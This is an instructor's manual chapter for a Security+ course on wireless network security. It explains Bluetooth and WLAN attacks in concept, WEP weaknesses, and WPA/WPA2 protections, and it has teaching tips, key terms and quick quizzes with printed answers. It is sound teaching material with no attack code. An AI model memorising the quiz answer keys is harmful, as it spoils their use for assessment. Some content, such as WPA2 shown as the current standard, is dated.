Security+ Guide to Network Security Fundamentals, Fourth Edition
Chapter 8
Wireless Network Security
At a Glance
Instructor’s Manual Table of Contents

Overview

Objectives

Teaching Tips

Quick Quizzes

Class Discussion Topics

Additional Projects

Additional Resources

Key Terms
8-1
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-2
Lecture Notes
Overview
Wireless is convenient and in today’s network, it is quickly becoming the standard
connection for many people. There are drawbacks to wireless, especially since the
security of these networks has evolved very slowly. The chapter discusses the various
vulnerabilities of various wireless protocols and some appropriate techniques for
properly securing wireless networks.
Chapter Objectives



Describe the different types of wireless network attacks
List the vulnerabilities in IEEE 802.11 security
Explain the solutions for securing a wireless network
Teaching Tips
Wireless Attacks
1. Note that several attacks can be directed against wireless data systems.
2. Explain that these attacks can be directed against Bluetooth systems and wireless local
area networks.
Attacks on Bluetooth Devices
1. Define Bluetooth, which is the name given to a wireless technology that uses shortrange radio frequency (RF) transmissions and provides for rapid ad hoc device pairings.
2. Explain that Bluetooth technology enables users to connect wirelessly to a wide range
of computing and telecommunications devices.
3. Emphasize that it provides for rapid “on the fly” ad hoc connections between a
Bluetooth-enabled device such as a cellular smartphone or a laptop computer and a set
of Bluetooth headphones or a mouse.
4. Refer to Table 8-1 to discuss different types of blue truth products.
5. Note that Bluetooth is a Personal Area Network (PAN) technology designed for data
communication over short distances.
6. Discuss the two types of Bluetooth network topologies: piconet and scatternets.
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-3
7. Explain that bluejacking is an attack that sends unsolicited messages to Bluetoothenabled devices.
8. Note that bluesnarfing is an attack that accesses unauthorized information from a
wireless device through a Bluetooth connection, often between cell phones and laptop
computers.
Wireless LAN Attacks
1. Discuss the evolution of the IEEE wireless networking standards.
2. Explain that a wireless client network interface card adapter performs the same
functions as a wired adapter with one major exception: there is no external cable RJ-45
connection.
3. Discuss the three parts of an access point (AP):
a. An antenna and a radio transmitter/receiver to send and receive wireless signals
b. Special bridging software to interface wireless devices to other devices
c. A wired network interface that allows it to connect by cable to a standard wired
network
4. Discuss the basic functions of an AP.
5. Explain the purpose of war driving and war chalking.
6. Discuss the attacks that can be mounted through the RF spectrum.
7. Mention the attacks that use access points:
a. Rogue access point
b. Evil twin
Teaching
Tip
Explain that Bluetooth hacking is highly scripted and a routine source of
entertainment for those attending “security” conferences.
Vulnerabilities of IEEE 802.11 Security
1. Mention that the primary vulnerabilities are in the areas of open system authentication,
MAC address filtering, and WEP.
MAC Address Filtering
1. Explain that MAC addresses are initially exchanged in an unencrypted format through
the WLAN. An attacker can easily see the MAC address of an approved device and use
it to join the network.
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-4
2. Mention that managing a large number of MAC addresses can pose significant
challenges.
3. Explain that MAC address filtering does not provide a means to temporarily allow a
guest user to access the network other than manually entering the user’s MAC address
into the access point.
SSID Broadcast
1. Remind students that in a wireless network, each device must be authenticated prior to
being connected to the WLAN (once the wireless device is authenticated, the user may
then be asked to authenticate by entering a username and password).
2. Discuss the ways the SSID can be used to secure the wireless network.
Wired Equivalent Privacy (WEP)
1. Note that Wired Equivalent Privacy (WEP) is an IEEE 802.11 security protocol
designed to ensure that only authorized parties can view transmitted wireless
information.
2. Explain that to encrypt packets WEP can use only a 64-bit or 128-bit number, which is
made up of a 24-bit initialization vector (IV) and a 40-bit or 104-bit default key. The
relatively short length of the default key limits its strength.
3. Mention that WEP implementation violates the cardinal rule of cryptography: anything
that creates a detectable pattern must be avoided at all costs. With WEP, IVs would start
repeating in fewer than seven hours.
4. Because of the weaknesses of WEP, it is possible for an attacker to identify two packets
derived from the same IV (called a collision).
Teaching
Tip
Because of its significant security vulnerabilities, it is not recommended to use
WEP.
Quick Quiz 1
1. ____ is the name given to a wireless technology that uses short-range radio frequency
(RF) transmissions and provides for rapid ad hoc device pairings.
Answer: Bluetooth
2. ____ is an attack that sends unsolicited messages to Bluetooth-enabled devices.
Answer: Bluejacking
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-5
3. True or False: Open system authentication is weak because authentication is based on
only one factor: a match of SSIDs.
Answer: True
Wireless Security Solutions
1. The wireless security requirements for personal wireless security are most often based
on two models promoted by the Wi-Fi Alliance: WPA Personal Security and WPA2
Personal Security.
Wi-Fi Protected Access (WPA)
1. Explain that the design goal of WPA was to protect both present and future wireless
devices.
2. Note that WPA is a subset of 802.11i and addresses both encryption and authentication.
3. Explain that WPA replaces WEP with an encryption technology called Temporal Key
Integrity Protocol (TKIP).
4. Discuss the advantages of TKIP over WEP.
5. Explain that WPA authentication can be accomplished by using either IEEE 802.1x or
preshared key (PSK) technology.
6. Discuss the vulnerabilities that can result of improper management of the PSK keys
including key management weaknesses and the use of passphrases.
Wi-Fi Protected Access 2 (WPA2)
1. Define Wi-Fi Protected Access 2 (WPA2) as the second generation of WPA security
introduced by the Wi-Fi Alliance in September 2004. WPA2 still uses PSK
authentication but instead of TKIP encryption it uses enhanced data encryption.
2. Explain that encryption under the WPA2 personal security model is accomplished by
AES-CCMP. CCMP is based upon the Counter Mode with CBC-MAC (CCM) of the
Advanced Encryption Standard (AES) encryption algorithm.
3. Mention that CCM is the algorithm providing data privacy, while the Cipher Block
Chaining Message Authentication Code (CBCMAC) component of CCMP provides
data integrity and authentication.
4. Note that WPA2 authentication is accomplished through PSK or by the IEEE 802.1x
standard.
5. Discuss the two common EAP protocols
a. Lightweight EAP
b. Protected EAP
Security+ Guide to Network Security Fundamentals, Fourth Edition
Teaching
Tip
8-6
It is recommended that AES-CCMP encryption and decryption be performed in
hardware because of its computationally intensive nature. Performing AESCCMP encryption in software requires significant processing power. If an AP
performed AES-CCMP encryption/decryption in software while serving several
devices, the AP would not be able to adequately service the devices, especially if
that access point lacked a powerful processor and a large amount of memory.
Other Wireless Security Steps
1. Note that antenna placement, power level controls, and rogue AP discovery tools can be
used to protect a wireless network.
Quick Quiz 2
1. True or False: WPA replaces the Message Integrity Check (MIC) function in WEP with
the Cyclic Redundancy Check (CRC).
Answer: False
2. PSK authentication uses a(n) ____ to generate the encryption key.
Answer: passphrase
3. The AES algorithm processes blocks of ____ bits.
Answer: 128
4. True or False: Wireless VLANs allow a single access point to service different types of
users.
Answer: True
Class Discussion Topics
1. Have students discuss how they would envision the devices that they own working
together and how that might be done in a secure manner.
2. Have students discuss their experiences with Bluetooth hacking or having been hacked
via Bluetooth.
Additional Projects
1. Have students research recent developments from the WiFi Alliance, especially those
related to the simultaneous use of peer-to-peer wireless devices while connected to an
infrastructure mode device.
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-7
2. Have students research the debate over WiMax and LTE and the promise of “mobile
broadband.”
Additional Resources
1. IEEE 802.11 Wireless networks
http://ieee802.org/11/
2. Bluetooth
http://www.bluetooth.com/
3. HIPAA and Wireless
http://www.airtightnetworks.com/home/solutions/industry-solutions/healthcare/hipaacompliance-and-wireless.html
4. WiFi Direct vs Bluetooth 4.0
http://www.pcworld.com/article/208778/wifi_direct_vs_bluetooth_40_a_battle_for_sup
remacy.html
5. WiFi Alliance
http://www.wi-fi.org/
Key Terms
 AES-CCMP The encryption protocol standard for WPA2.
 bluejacking An attack that sends unsolicited messages to Bluetooth-enabled devices.
 bluesnarfing An attack that accesses unauthorized information from a wireless device
through a Bluetooth connection, often between cell phones and laptop computers.
 Bluetooth A wireless technology that uses short-range radio frequency (RF)
transmissions and provides for rapid ad hoc device pairings.
 evil twin An AP set up by an attacker to mimic an authorized AP and capture
transmissions, so a user’s device will unknowingly connect to this evil twin instead.
 Extensible Authentication Protocol (EAP) A framework for transporting
authentication protocols that defines the format of the messages.
 initialization vector (IV) A 24-bit value used in WEP that changes each time a packet
is encrypted.
 keystream attack (IV attack) A method of determining the keystream by analyzing
two packets that were created from the same initialization vector (IV).
 Lightweight EAP (LEAP) A proprietary EAP method developed by Cisco Systems
requiring mutual authentication used for WLAN encryption using Cisco client software.
 Media Access Control (MAC) address filtering A method for controlling access to a
WLAN based on the device’s MAC address.
 preshared key (PSK) A key value that must be created and entered into both the access
point and all wireless devices (“shared”) prior to (“pre”) the devices communicating
with the AP.
Security+ Guide to Network Security Fundamentals, Fourth Edition
8-8
 Protected EAP (PEAP) An EAP method designed to simplify the deployment of
802.1x by using Microsoft Windows logins and passwords.
 rogue access point An unauthorized AP that allows an attacker to bypass many of the
network security configurations and opens the network and its users to attacks.
 Service Set Identifier (SSID) The user-supplied network name of a WLAN; it can
generally be alphanumeric from 2 to 32 characters.
 SSID broadcast The transmission of the SSID from the access point to wireless
devices.
 Temporal Key Integrity Protocol (TKIP) A WPA encryption technology.
 war chalking The process of documenting and then advertising the location of wireless
LANs for others to use. Wireless networks were identified by drawing on sidewalks or
walls around the area of the network.
 war driving Searching for wireless signals from an automobile or on foot using a
portable computing device.
 Wi-Fi Protected Access (WPA) The original set of protections from the Wi-Fi
Alliance in 2003 designed to protect both present and future wireless devices.
 Wi-Fi Protected Access 2 (WPA2) The second generation of WPA security from the
Wi-Fi Alliance in 2004 to address authentication and encryption on WLANs.
 Wired Equivalent Privacy (WEP) An IEEE 802.11 security protocol designed to
ensure that only authorized parties can view transmitted wireless information. WEP has
significant vulnerabilities and is not considered secure.